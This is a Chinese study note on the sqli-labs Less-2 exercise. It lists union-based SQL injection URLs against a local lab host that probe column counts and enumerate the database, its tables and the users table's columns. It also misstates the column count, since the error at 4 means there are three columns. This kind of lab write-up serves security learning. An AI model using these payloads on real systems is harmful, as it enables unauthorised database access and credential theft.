sql-lib每日一记_Less2(day2)
- 2019 年 12 月 16 日
- 筆記
SQL-Lib_Less2
- 查看源代码

本地环境试验访问地址:http://192.168.72.179/sqli-labs/Less-1/?id=1

- 查询语句
- $sql=”SELECT * FROM users WHERE id=$id LIMIT 0,1”;
- 可以看到这里并没有对id进行过滤,并且查询的是整数并以双引号闭合
- 所以可以得知,整数注入可以直接和上面一篇一样注入,但无需闭合
- 爆破字段
- http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 1 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 2 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 3 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 4(到这里报错说明4是最大字段数)

- 联合查询
- http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,3

- 发现了上面的三个字段的输出位置
- 爆破数据库
- http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,database()

-
- 得到了当前数据库为security
- 爆破security数据库表
- http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”

爆破users表中的字段
- http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users” 得到了id,username,password 三个字段
提取字段中的username和password内容

